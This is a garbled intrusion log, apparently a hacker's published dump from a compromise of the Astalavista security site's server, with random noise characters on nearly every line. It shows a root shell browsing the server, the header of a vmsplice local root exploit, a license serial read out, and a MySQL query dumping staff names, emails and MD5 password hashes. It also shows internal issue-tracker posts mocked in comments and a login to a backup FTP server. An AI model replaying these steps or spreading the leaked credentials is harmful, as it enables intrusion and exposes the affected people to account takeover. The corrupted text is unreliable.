1 p, B* d& }) i5 V% e! R1 g- D. T?>
, t1 C% B$ l$ o8 I9 g( z8 i" e7 ^4 C9 @" d7 H% C1 J4 W% ^
sh-3.2# cd ..% l0 v! f# K" B
sh-3.2# cd com
$ O3 a$ e5 h' q# k! Q5 k! Q& Ash-3.2# ls -la
' B, m& A) f; S0 D8 g: k+ T' Dtotal 141208
. k1 n' B3 g* h% Wdrwx–x–x 10 com com 4096 Apr 28 12:40 .2 i2 M- M! b% ]$ Y( i
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .. }! d/ I$ a4 n. O0 D1 D' g0 B
drwx—— 2 com com 4096 Jun 4 04:04 backups
- b% u$ N% D: T9 i& M& ^9 F7 {-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql
5 O* A+ b2 X( j9 ?( idrwxr-xr-x 2 com com 4096 May 12 15:20 backup_system: i9 F4 }& o1 Y; N' g
-rw——- 1 com com 21880 Jun 2 08:07 .bash_history
% S" y) U1 _% w' |-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout
5 z) R3 f' N- m' G-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile6 ]0 y. R% ?6 ?8 \' g7 V5 ?
-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc. }# j! S% C/ x
drwx–x–x 3 com com 4096 Jan 29 2008 domains- a% Z' \+ b: F. ~
-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed
G7 _1 ?8 W* t% hdrwxrwx— 3 com mail 4096 Jan 6 19:24 imap! Q2 w/ Q# j( e: z
-rw——- 1 com com 69 Nov 18 2008 .lesshst
, n( E5 ?! X% I1 j& f& Z# tdrwx—— 2 com com 4096 Sep 24 2007 mail% }8 |- M( D1 e" u) s5 D5 q. @
-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history; [# M2 z" }' x I
drwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp& D% p7 D- I: V$ w7 b. o! U* m
lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html6 i6 i, `$ h, e( `% M% G
-rw-r—– 1 com mail 34 Sep 24 2007 .shadow# ~2 u! d- b' l
drwx—— 2 com com 4096 Aug 26 2008 .ssh2 z: l: H; [# M. ~
-rwx—— 1 com com 8515 Feb 10 2008 t
4 @' x5 D6 S+ d* D( [+ J-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c
+ ]+ }# l( x8 _9 b8 c; _/ s+ edrwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp
5 p$ F) m( L% p5 S1 e2 d7 x2 P-rw-rw-r– 1 com com 617 May 20 2008 .toprc
- O0 W& Z+ P9 l: p( v; `7 ^4 y-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql
" ?9 H* T$ t3 p0 D* u-rw——- 1 com com 16629 Mar 28 21:46 .viminfo
! I \7 U2 V. y4 f* e-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc
, {- q' j! a" n( o" w7 D' E5 ]# n& X T# |( O
sh-3.2# head t.c( x: n0 a8 W: I1 H
/*
% l$ f1 b$ }2 v3 H. s- z' `* jessica_biel_naked_in_my_bed.c
5 }, Y) o6 O: H. i7 ~" ?2 d*4 T5 ], @6 Y$ l( [, K; E! q. z( {
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
8 N! O- @% W8 J% ^) |* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.5 v2 I2 _- {0 c6 U5 x5 x
* Stejnak je to stare jak cyp a aj jakesyk rozbite.
$ V: I6 m1 l X6 g* t*
7 O5 U9 D. H) \' W# A7 ^, ?6 i: z, j5 P) G* Linux vmsplice Local Root Exploit
& w9 O! L; ?: L! c2 S# p1 u* By qaaz
3 ^. T8 W4 W7 q% z6 c9 t*8 w) ^( K% z" W9 {, p
: Y. l" P, W: o
sh-3.2# cd /
5 b2 b0 X; U7 q2 h) @( _6 F4 Csh-3.2# ls -la& Y! {) t) [$ y+ B; Q
total 360
0 U1 Q( T8 c+ u% c6 Bdrwxr-xr-x 25 root root 4096 Jun 3 02:43 .$ n- B4 ?/ t' r# A
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..! R& K- r& Y2 H% ] u& @
-rw——- 1 root root 10240 Jun 3 02:39 aquota.group
5 z2 s( K/ S1 }/ D0 O) A( p+ F; e-rw——- 1 root root 10240 Jun 3 02:39 aquota.user
3 q7 [3 E, R( U-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db/ O! b1 Z3 D, I/ y, K" R! @
-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck; A9 U/ r5 r" e& R
-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel+ b# Q* d: @/ l" w" ~0 x8 H
drwxr-xr-x 3 root root 4096 Dec 29 2007 backup
4 W( p) P* D! y% h$ I5 e1 edrwxr-xr-x 2 root root 4096 Jun 4 04:03 bin
/ U3 N+ |' l' j) W) ~% e# k; xdrwxr-xr-x 5 root root 4096 Jun 2 14:06 boot
! u8 P8 q3 u! c' ]drwxr-xr-x 11 root root 3620 Jun 3 02:43 dev
' T; {- d% U( x- C2 mdrwxr-xr-x 84 root root 12288 Jun 4 03:16 etc- L; Q, J- x) L0 z; d1 z
drwxr-xr-x 14 root root 4096 Mar 11 17:56 home
" d! n' y, a1 O/ r' J9 n$ D-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf
{7 w' q o s3 t1 B7 E6 qdrwxr-xr-x 11 root root 4096 Jun 4 04:02 lib
3 q) D) D9 W) [; [7 gdrwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64
5 p9 e7 t2 `: Q; f4 Q# Jdrwx—— 2 root root 16384 Sep 11 2007 lost+found
8 {9 O/ n( ^/ jdrwxr-xr-x 2 root root 4096 Mar 11 17:56 media
4 r" m# d; j& ?! C0 Qdrwxr-xr-x 2 root root 0 Jun 3 02:43 misc5 z5 E. |+ w. D" F, a) l* g
drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt
$ F3 `$ b# p5 J-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg
; c O0 B/ i( w+ y7 c. X; pdrwxr-xr-x 2 root root 0 Jun 3 02:43 net
* m* E; g5 q$ d3 z" Q' udrwxr-xr-x 3 root root 4096 Mar 11 17:56 opt( Q" A, n, r$ f
dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc: L! z% t! E( D4 R4 c% W Y# X
drwxr-x— 15 root root 4096 Jun 4 08:40 root, U) P3 `& i: g# r# I
drwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin
3 Z! N6 r" J, Q$ @0 m sdrwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux, g% A$ U' B0 N. A! N I
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv6 v; t/ b0 k& S
drwxr-xr-x 11 root root 0 Jun 3 02:42 sys2 P4 m8 k7 N3 i* v. |+ I5 D, E
drwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp, \! U. l: @- ~8 _* s4 B
drwxr-xr-x 16 root root 4096 Jun 2 13:56 usr
$ Y/ b% |) N1 e& Ddrwxr-xr-x 26 root root 4096 Jun 4 03:16 var
/ V# e7 Q8 S0 P; J% Y
5 F; n8 j% O0 R/ {+ `( Hsh-3.2# cd opt' _9 ]/ ~- p* y s
sh-3.2# ls -la' M7 b3 J0 x4 g4 m8 U( D, O/ y
total 20
8 D" C; f$ L9 [- ?drwxr-xr-x 3 root root 4096 Mar 11 17:56 .
2 r- ^, c3 B- o$ E' @drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..2 y7 E- G# r W. q
drwxr-xr-x 15 root root 4096 Mar 20 2008 lsws
& { S7 `% |$ d; L! k9 f: \( W/ J
sh-3.2# cd lsws/
: d% t3 p* q9 N- bsh-3.2# ls -la$ ?9 b/ e1 F2 J7 v( o
total 1080 @! g0 o) M/ ?0 w& n7 S. I
drwxr-xr-x 15 root root 4096 Mar 20 2008 .
4 j5 ]. ]9 U9 kdrwxr-xr-x 3 root root 4096 Mar 11 17:56 ..4 ~" R3 G4 z8 E
drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons
6 k) V8 l( D$ w! B, Ldrwxr-xr-x 13 root root 4096 May 29 15:10 admin- X9 N& l, g! I: j: f9 X
drwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate2 R0 w6 \* A9 W) A7 P0 C
drwxr-xr-x 2 root root 4096 May 29 15:10 bin6 d: k: t: d) y% m( C
drwx—— 4 apache apache 4096 Jun 3 02:43 conf- F5 c1 e% i5 ^0 p/ J
drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT( n# x' S& s3 \5 `
drwxr-xr-x 2 root root 4096 Sep 15 2008 docs
/ F5 u# p3 P4 n2 \ n$ `: G, Zdrwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin
' v- y7 u4 r/ Bdrwxr-xr-x 2 root root 4096 Sep 15 2008 lib
. A4 u' l: V, Y6 z7 R3 g4 F! ?-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE1 C5 [- o; a4 B n/ g
-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP
9 ~$ ~ r+ ^( v8 x+ Z* D-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL2 W, K/ c9 M6 @
-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP
' E+ J, y$ I% q' a ydrwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
! U& _* `- |; Z' q6 A4 Q2 Edrwxr-xr-x 2 root root 4096 Mar 20 2008 php* R6 [9 C* E9 Y- e# H7 N
drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild
5 W C# L: }1 O' e& Mdrwxr-xr-x 3 root root 4096 Mar 20 2008 share+ W1 P+ u- J3 J, Q$ u4 ^; G
-rw-r–r– 1 root root 6 May 29 15:10 VERSION4 C0 C, i0 h4 ~! x5 P
* L" Q; ?) T. {) B0 A3 ?6 }
sh-3.2# cd conf
- m% y2 h4 e+ tsh-3.2# ls -la; O+ w' O% k0 [8 v
total 483 H" @/ L2 D* F/ D1 L! |
drwx—— 4 apache apache 4096 Jun 3 02:43 .
- Y6 C* A- E: B- s2 {/ Wdrwxr-xr-x 15 root root 4096 Mar 20 2008 ..
7 C5 q. ?( h' f- s% {. A, y. H( Rdrwx—— 2 apache apache 4096 Mar 20 2008 cert
7 s/ G0 O( N: B D# W$ t-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml
- a4 z2 d. }4 z2 N- t4 ?8 P: Q-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak1 h5 e9 W8 L! a7 F: o$ Y
-rw-r–r– 1 root apache 0 Jun 3 14:11 .last2 B& p! _6 j' T% ]
-rw——- 1 apache apache 256 May 29 15:10 license.key3 i" M" O6 u2 b
-rw——- 1 apache apache 256 Mar 21 2008 license.key.old
4 V6 D/ {) p1 l" w' b6 r; P$ {6 p+ R-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties
6 F2 J& A% i3 e7 w/ s1 l: }-rw——- 1 apache apache 20 May 29 15:10 serial.no3 u* A" e1 d% w# }% V4 ?
drwx—— 2 apache apache 4096 Mar 20 2008 templates0 g) ^: H% P r( N! w- n
& b6 m5 L$ E) S4 d6 O9 q9 y1 c; lsh-3.2# cat serial.no- J( W0 y1 }+ d' q0 R3 B+ k
IbDl-oVsO-CKqL-wVRa
8 I# x& ~7 d8 B. W2 |3 E. ~! A8 ]* J; ?" N- W
sh-3.2# mysql
d5 ?1 B( n/ B! q: v9 ` tWelcome to the MySQL monitor. Commands end with ; or \g.. l z! q% O5 B4 |3 |
Your MySQL connection id is 286844
0 R5 @6 }: w4 X2 K6 pServer version: 5.0.45-community-log MySQL Community Edition (GPL)+ \7 |1 f$ l; g; |( g5 b; Y
# `- U' _0 A O8 Y \& P# n# |! fType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.4 S' M1 p: F- l9 [9 C( l
+ v/ L- M- {; h/ ^% f' R* ?& smysql> show databases;' y* U: o B! c0 g5 u: @
+———————–+. f9 K! j4 O4 ~# `, o m
| Database |
9 \) }3 D% f$ w/ e( i8 P( b% q. L+———————–+4 M2 d; ~5 b! ~' N" t
| information_schema |
2 V' W4 x6 v/ J, ?/ ?. f4 M| astanet_ads |
2 M1 ^% a& ?% i0 A- a& a# D5 ]| astanet_mailing_lists |# {% @: P: B O( C
| astanet_mediawiki |
/ f# ?! G1 q# {| astanet_membersystem |
+ |* W5 w* J% ~$ Z' t& c| com_contrexx |# E* ]$ D+ Q4 f9 p/ C0 Y) _; ?
| com_contrexx2 |' Q# ?* i8 O1 u6 r7 {! N$ o) e
| com_contrexx2_live |
1 c p" h# P( F8 ~1 \& b| da_roundcube |
9 X* e6 _. H& x; L5 C" f| dolphin |
# i2 z* j; S7 a& }| ideapool |: L t! h v* I/ i$ c8 Q3 \" M& V
| mysql |
3 _+ s+ i8 e( r% A5 |6 G$ J6 G9 G| test |
, l- M8 ~4 \: X! w. R0 C" d| yourmaster |
% ^* f: u$ `, t% P( h9 U" f& K+———————–+
* D( d5 T# L: ?+ b14 rows in set (0.00 sec)! P5 o, P, G5 I# y* D) z( H ~
) l( W* l" R m; S6 I* o4 K% a( U5 }
mysql> use ideapool
6 `, B. w1 O; e- tDatabase changed
6 C% D: n7 M1 G" F$ u: smysql> show tables;" E; H) H' L+ l! U! B! w/ P
+———————————–+: Z9 J4 g+ G7 ~$ N7 C- A8 ~. {
| Tables_in_ideapool |
0 G7 g5 \2 b$ v( P' D+———————————–+
% k2 V* _9 X5 f! k2 L| eventum_columns_to_display |; l; h% M- h* j8 r5 Z
| eventum_custom_field |1 ]' i- n% q$ g& h+ s
| eventum_custom_field_option |
/ i: K W( ]% @8 l| eventum_custom_filter |: H5 d" j8 g8 p8 ?
| eventum_customer_account_manager |0 Q8 l7 o6 v6 b* u+ d
| eventum_customer_note |+ |9 m0 ~4 C, [4 A" Y0 E: _/ l
| eventum_email_account |
! Y1 t% a) n) u7 [% W2 j+ c. w4 B| eventum_email_draft |+ R: R3 r% ~) @0 [
| eventum_email_draft_recipient |1 z* P o1 K" k# |+ U
| eventum_email_response |
" u/ \9 M* l: m- M* f: h+ s| eventum_faq |, y/ @4 u0 s- K, s' E' |
| eventum_faq_support_level |1 m+ O8 }% \0 R5 t; |/ R" ?6 w: q
| eventum_group |
" b3 U- A( a4 a2 q: Z% i9 P. e| eventum_history_type |
, n# p! B- u# E) v0 S" u& f6 G| eventum_irc_notice |$ z7 ?, `1 Z- A- ], e% x2 o$ ]
| eventum_issue |4 a- T- a: p1 @$ u9 ^. n
| eventum_issue_association |
! C( B0 h" V. _" b- ?| eventum_issue_attachment |( [& v* v9 v2 E9 A. Z' K+ F( k
| eventum_issue_attachment_file |
8 i6 v! r, @; D& v! e| eventum_issue_checkin |
. t% r( K8 D* e- y; s7 U" D| eventum_issue_custom_field |
& ^, {9 H6 q' F| eventum_issue_history |+ C, [7 n; z }# t# W6 V
| eventum_issue_quarantine |/ m q- k5 f( B* J$ c
| eventum_issue_requirement |
6 h# b1 U* e& D| eventum_issue_user |
7 H' Q" j) E0 L2 Y| eventum_issue_user_replier |' L. l% J% C% `8 b, S& {& W4 ~- B
| eventum_link_filter |+ W$ J! g5 W A7 U* b, d, @
| eventum_mail_queue |9 G, Y. p8 j# _
| eventum_mail_queue_log |/ i0 i. D/ f; c0 r, O) i
| eventum_news |
& E/ Y# u! `) D3 [4 \| eventum_note |
9 N6 x7 z# }1 c| eventum_phone_support |
h b- D0 N5 t% A| eventum_project |
3 p; h7 K! A5 }| eventum_project_category |
; f7 T- j9 a5 r& p) ?- G| eventum_project_custom_field |% a) p* j' Q" l
| eventum_project_email_response |6 k1 m1 J$ i3 Y F% v( Q
| eventum_project_field_display |3 M0 g9 n/ a6 h0 A+ }& }
| eventum_project_group |
! s4 q/ @" _6 F: e1 j| eventum_project_link_filter |
5 k( t# x" Q3 R5 m| eventum_project_news |5 A0 f+ N' ?; ~" }
| eventum_project_phone_category |' s3 a$ P) V p' b- {
| eventum_project_priority |) C8 Z! y4 E3 _! G3 i! I
| eventum_project_release |- _6 g' D3 Z6 o$ `( o
| eventum_project_round_robin |% g9 l Q% W5 l- B
| eventum_project_status |
! K L! P9 i7 [! W| eventum_project_status_date |$ {7 f' h, J& Y
| eventum_project_user |
. o: v6 i/ r: T' X" l, F% N| eventum_reminder_action |+ g" n+ Q# e+ ]8 {
| eventum_reminder_action_list |
$ ^0 {; Q5 u" d8 \! H) b4 d| eventum_reminder_action_type |" I7 o$ G: @! G
| eventum_reminder_field |0 v( B5 r; C$ Z: e* e6 n
| eventum_reminder_history |) ^( w B. d5 V" Q
| eventum_reminder_level |
9 ^/ ^/ F; f! C% c3 y' c; \| eventum_reminder_level_condition |2 q. r/ H' G# M* ?
| eventum_reminder_operator |
\ S$ d2 q/ O e" ~( H# z| eventum_reminder_priority |
1 b: `/ A7 u! q5 g1 z% q| eventum_reminder_requirement |
7 `1 f- C; K1 A4 ]& P| eventum_reminder_triggered_action |
- h) y9 k/ I, g6 b| eventum_resolution |3 Q7 r4 Y! V% k" T: [
| eventum_round_robin_user |
0 w W( _" v) z9 F; r6 x| eventum_search_profile |
0 W/ l9 `: H$ A6 M1 d0 n0 g2 X| eventum_status |
}- s" F! f0 C: ]. [| eventum_subscription |
3 S Y$ o- m+ j6 h. [| eventum_subscription_type |4 Q+ a0 A- C' S0 z2 ]: ]. ~7 l3 j
| eventum_support_email |; N- \) |4 W2 d# e( E) n
| eventum_support_email_body | A7 W- f1 V8 r r* V) M
| eventum_time_tracking |4 X( X( G9 [4 a1 z- y
| eventum_time_tracking_category |8 |- a }0 Q/ Z4 X P4 x
| eventum_user |; q+ H% f3 s, `+ u# C- k$ z% B$ I
+———————————–+& i% I* P: f ]( y5 q
69 rows in set (0.00 sec)
0 w/ s; V3 m4 ~# u
P( F, a( V( L% ymysql> describe eventum_user;" k! E% V/ _: j M
+————————-+——————+——+—–+———————+—————-+3 _2 {2 @3 M9 H! }' [/ w: }
| Field | Type | Null | Key | Default | Extra |. Y8 G# l! _$ f% X1 B
+————————-+——————+——+—–+———————+—————-+ E0 d5 K+ c; P
| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |
# c# ^8 D1 e6 g( ^* F| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |
9 l/ |! L9 k7 ]3 ~4 w) j7 S4 ~7 {| usr_customer_id | int(11) unsigned | YES | | NULL | |
/ k. Q7 ?$ w/ D- S+ W5 Z| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |3 l2 a9 n+ A/ o' j5 ^
| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |8 X) Q( A3 B4 y4 p
| usr_status | varchar(8) | NO | | active | |
; k6 u: V! j5 K, M+ e| usr_password | varchar(32) | NO | | | |
4 |/ m) C0 u( M1 l) {| usr_full_name | varchar(255) | NO | | | |
7 ^/ Q1 ~( U: ]& |5 i! q7 y. Q. {| usr_email | varchar(255) | NO | UNI | | |
% ~6 W4 a: z, S; F9 {| usr_preferences | longtext | YES | | NULL | |
' k u3 F/ a5 \6 l# J| usr_sms_email | varchar(255) | YES | | NULL | |
6 _* Y% k/ y5 }| usr_clocked_in | tinyint(1) | YES | | 0 | |
% d3 Y& y; I2 E* I& || usr_lang | varchar(5) | YES | | NULL | |+ O2 I) O: {# c
+————————-+——————+——+—–+———————+—————-+
. e8 y2 R# E, ~) y13 rows in set (0.00 sec)) t( }5 Y% f9 A% o: S' Y
7 q4 D7 x, o) f- }mysql> select usr_full_name,usr_email,usr_password from eventum_user;; t- K+ A3 Y) ?6 p6 k! r$ J C! x
+———————-+——————————-+———————————-+2 f- G+ N& d/ w+ ]4 G) G
| usr_full_name | usr_email | usr_password |
: \ a0 o+ J5 [5 h0 d6 {+———————-+——————————-+———————————-+" s* }; Y, S" C& _
| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |
, y, U+ ]( U- |7 Z. a/ O| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |! J) O/ [; R7 ?% @5 n3 Z
| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |0 f$ r* Q$ [: ?6 f/ s1 N
| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |# ]$ c) Y0 m) i
| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |
w& o& T6 r+ I0 M! Q4 d| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |2 v* O, d: W/ }3 i2 Z
| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |; i% N9 y; N5 d/ O, k. S. g
| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |: K, Y6 U/ V' c# F: h1 L
| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |
8 d/ H: G% b: {# R) Q& C$ g( U1 I" a| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |0 [1 {' S4 h$ r2 R
| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |
5 n0 ]9 I# K% o| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |
8 |3 V* u* k; p1 [" d| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |7 [( D5 w, \4 X& F( c6 c$ O3 u
| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |) d7 P' f* R9 _2 f$ Y* }
| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |
: s/ K6 N! E+ A$ d, |; _2 X+———————-+——————————-+———————————-+7 ~8 Z" ~2 r7 D- l' O9 D) P3 t+ r( [
15 rows in set (0.00 sec)
" `& H. \4 e: V0 Z9 K
7 m$ C/ r( H% d0 z& O+ U) T2 W1 emysql> select iss_description from eventum_issue where iss_id = 43;6 E( P6 }7 j9 j6 h; h
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+! d% c4 Z% a$ M
| iss_description ) J% g$ y: @) c& q0 g- k( D
|. o8 {: E$ X9 i9 }, V! b/ E2 N2 Y" F2 S
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+- a* x7 N& B8 a! u6 V4 r( O4 y
| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be
) G3 b. m- W! A2 o- b. M( Vconnected for 90 mins… 120mins… so what i propose is something like:" `- y; \3 v9 ~7 h# D% w' |1 h2 j
链接标记[url]http://www.surfthechannel.com/[/url]8 N: M. a7 w# f* @0 H1 s5 r
since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system2 { x5 x1 }, [
like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t
* X- j8 J, U! J: k- K2 Ubreak any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off& G5 g+ ^3 t* u" B1 Y
if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…
, ^6 h9 W) S$ n4 ]& l
$ ~: X" G- Z1 w+ W6 p7 _& ~4 DWe could also put advertisement during play on the flash video player itself… extra $$…! @5 F7 E$ I/ v( R% ], u' h% \1 t
8 n7 y' ?4 p; s6 [% @- b; q# ~
By sykadul |( P2 R: I- d* s
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
3 ], j+ K+ `6 d; B, o2 F' q1 row in set (0.00 sec) @3 N% N" p4 H5 l
$ [" M6 a1 r, J8 W
// Money and extra $$ is all they care about. remember that.3 O* b! G8 R3 Z# R0 z" Q. ^0 z
2 s- N. m+ |# @' i% _1 }$ ?/ qmysql> select iss_summary,iss_description from eventum_issue where iss_id =42;1 X h O9 Z. a9 J& F5 ]
+————————+——————————————————————————————————————————————————————————————————————————————-+
" S8 x$ h7 V9 u1 [| iss_summary | iss_description ' f0 C. q) O4 ?7 ~/ K8 t: ~6 H
|
/ }1 t; |2 s# M9 g& e+————————+——————————————————————————————————————————————————————————————————————————————-+' U! O G& {' W# ~
| Forum for REAL EXPERTS | Hello,2 u4 U+ E6 p; j2 U1 J. p
- c# W+ m' p+ m; A" f, F
Ishtus and I,
+ ~; N2 Q4 M8 [; { P9 V0 n6 h* |0 i) C5 M' k4 f, Y4 G. T
Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide& I8 X6 K6 M( h! S4 b
ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..7 }. Y- t: H2 k8 o6 h& z
( n8 |& Z. A: z) w8 k9 ]One example a friend of mine from coresecurity.com!
3 m g+ o+ y M) ?) t& u* N6 j
6 k3 m. L. K% d4 U% M% i& U2 k& }We could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..3 k. n+ B6 |# r8 H
+ F, R3 V& h' M w/ C
|5 S* G: b% U! T: O' C
+————————+——————————————————————————————————————————————————————————————————————————————+0 `" m- x/ ` h4 x
1 row in set (0.00 sec): B. R6 p/ |" N# w
! S, z! P P }5 n0 m4 \9 e \// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…4 w6 W) N* P( C3 @% T* ~ Z
1 q) W' X8 ~5 N$ A
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;
/ {- s& C6 D" S& P7 `5 q& Z0 f+——————+———————————————————————————————+& s9 I0 b3 g% z; q; e4 I
| iss_summary | iss_description |8 A# ~! r7 T: o6 Y+ `
+——————+———————————————————————————————+
% ]0 P$ Q% t7 J; [# N4 P5 x7 M| Website guidance | Virtual Girl which guides you trought the website.
0 I8 S$ ]# ]% ]: g* [& m
+ o, N; q# e( p# f+ e6 {9 |/ u: HWe need a girl with who you can ( talk )!!!' ^3 w) P& U, I" H% V2 P6 a
Also for the News!
; f1 z! |) y& C( {: I x! n/ ]So my suggestion is a girl who read you the news loud if you like!
( V8 q4 W% z1 n1 y g0 Ayou can choose between read yourselfe or she read it for you or both!3 ^5 z9 {2 G% v! C4 O" j
, d+ L" ?: g6 x% `3 z# R6 v
Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!3 T, i/ T+ o3 j1 Y( m
1 ~9 @8 M' {* {" q. a) O
Have a look on the example girls!!
5 }# j* w% F+ E( \6 I1 z* U1 U% I) |& m- i; A! a6 G
链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]( m% j/ Y# _6 i: b3 e6 r
1 V/ T; L0 r y: E* \4 Cor that) d9 O) {1 V. L; M6 K# }
6 o: y8 z; V5 R# a! b1 E链接标记[url]http://www.yellostrom.de/[/url]* e* k, V6 V; {- `# [
6 ]9 \5 U0 f% |* x( H
|
3 M3 N) ^5 _, k2 [+——————+———————————————————————————————+* [3 `. c4 @( J7 L- l
1 row in set (0.00 sec)" g/ c" h' X7 }1 d
$ K3 Y3 I! O" o0 [8 h, g// ha ha.+ ~. b( l6 t0 J1 @$ o; q; P" S6 C
* Q9 A+ r5 @9 V! dmysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
% y5 Z# y% O6 n) X0 W/ B+————————–+———————————————————————————————————–+
* w1 o6 J' U/ D |) e3 u| iss_summary | iss_description |) H6 W& F0 j2 }4 P
+————————–+———————————————————————————————————–+
4 s. O# R4 q+ t% L! s. x7 N| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |5 t8 U+ X* F$ Q" Y8 Z8 B' i1 t0 k
+————————–+———————————————————————————————————–+$ p3 G2 V7 T6 Q3 b
1 row in set (0.00 sec)7 K5 w& C- |7 L9 A5 t
" }! t+ q% G3 r( ?// LOL.
5 F5 D* O. Z3 {; k9 I
: m8 [1 j' Z3 R ymysql> exit
% o* l& Z. C) w+ P. g9 C5 E% D; s, @Bye
+ Q: A" w4 ~3 ^2 ^3 K, F
# \3 U# ^" A d% M T6 |2 {" Ssh-3.2# ftp 212.254.194.163
r# l$ Y* \5 \; ] yConnected to 212.254.194.163.
2 y% s2 u; d5 I1 x220 BackupCOM_VW FTP server ready.
( }7 @# g, o9 @( q+ x7 _504 AUTH: security mechanism ‘GSSAPI’ not supported.
. {, _! e* l. l; }504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.
, D# K; ?/ |: B0 \# ^KERBEROS_V4 rejected as an authentication type4 S1 ]2 D; i/ g6 _: J0 _
Name (212.254.194.163:root): astalavista.com4 y, P4 l+ m+ u) A, d5 O
331 Password required for astalavista.com.! Z; [0 c, K$ Q8 o
Password:' t9 U8 b4 V H) ^
230 User astalavista.com logged in.
+ e2 Q& @; Y7 E. J! C1 DRemote system type is UNIX.6 K( L3 `: T' B3 G; O) e/ Y; y; {9 |
Using binary mode to transfer files.
8 _- a+ X* k( I9 p. v7 C/ nftp> ls -la
, ` M+ W$ h ]% g5 s227 Entering Passive Mode (212,254,194,163,2,188)
/ R: l, }4 [% d1 f& l% V- y150 Opening BINARY mode data connection for ‘file list’.
7 X6 b Z5 T B) @0 x, Rdr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com3 Y0 c# M) C" |- n( ]3 o% t* U
226 Transfer complete.
4 h3 H# C* N( V& B* @" ?8 f( bftp> cd astalavista.com
